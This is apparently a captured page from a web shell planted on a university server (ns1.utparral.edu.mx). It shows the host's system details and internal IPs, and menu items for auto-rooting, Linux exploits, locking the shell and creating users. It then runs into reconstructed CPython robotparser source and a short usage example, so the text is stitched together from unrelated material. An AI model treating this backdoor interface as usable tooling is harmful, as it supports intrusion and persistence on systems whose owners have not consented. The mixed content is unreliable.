Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
10.10.1.9 | 10.10.1.254
Can't read [ /etc/named.conf ]
daemon
Terminal | AUTO ROOT | Adminer | Backdoor Destroyer | Linux Exploit | Lock Shell | Lock File | Create User | README | + Create Folder | + Create File
/usr/lib/python3.10/urllib/__pycache__/ [ HOME SHELL ]
Name                         Size      Permission
error.cpython-310.pyc        2.79 KB   -rw-r--r--
__init__.cpython-310.pyc     131 B     -rw-r--r--
parse.cpython-310.pyc        34.05 KB  -rw-r--r--
request.cpython-310.pyc      69.67 KB  -rw-r--r--
response.cpython-310.pyc     3.39 KB   -rw-r--r--
robotparser.cpython-310.pyc  7.16 KB   -rw-r--r--
Code Editor : robotparser.cpython-310.pyc
The editor pane shows the raw bytes of the compiled bytecode file; the readable string fragments correspond to the opening of CPython's urllib/robotparser.py, reconstructed below. The dump breaks off partway in (at the start of set_url()):

"""robotparser.py

Copyright (C) 2000 Bastian Kleineidam

You can choose between two licenses when using this package:
1) GNU GPLv2
2) PSF license for Python 2.2

The robots.txt Exclusion Protocol is implemented as specified in
http://www.robotstxt.org/norobots-rfc.txt
"""

import collections
import urllib.parse
import urllib.request

__all__ = ["RobotFileParser"]

RequestRate = collections.namedtuple("RequestRate", "requests seconds")


class RobotFileParser:
    """This class provides a set of methods to read, parse and answer
    questions about a single robots.txt file.
    """

    def __init__(self, url=''):
        self.entries = []
        self.sitemaps = []
        self.default_entry = None
        self.disallow_all = False
        self.allow_all = False
        self.set_url(url)
        self.last_checked = 0

    def mtime(self):
        """Returns the time the robots.txt file was last fetched.

        This is useful for long-running web spiders that need to
        check for new robots.txt files periodically.
        """
        return self.last_checked

    def modified(self):
        """Sets the time the robots.txt file was last fetched to the
        current time.
        """
        import time
        self.last_checked = time.time()

    # ... dump truncated here ...
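For context, robotparser.cpython-310.pyc is the compiled bytecode of the standard-library urllib.robotparser module. A minimal sketch of how its RobotFileParser class is used; the module and method names come from the Python standard library, while the robots.txt rules and the "MyBot" user agent are invented for illustration:

```python
from urllib.robotparser import RobotFileParser

# Normally you would call set_url()/read() to fetch a live robots.txt;
# here we feed rules directly to parse() so the sketch runs offline.
rp = RobotFileParser()
rp.parse([
    "User-agent: *",
    "Disallow: /private/",
])

print(rp.can_fetch("MyBot", "http://example.com/private/page"))  # False
print(rp.can_fetch("MyBot", "http://example.com/index.html"))    # True
```

can_fetch() answers per-agent permission questions against the parsed rules, so a crawler can check each URL before requesting it.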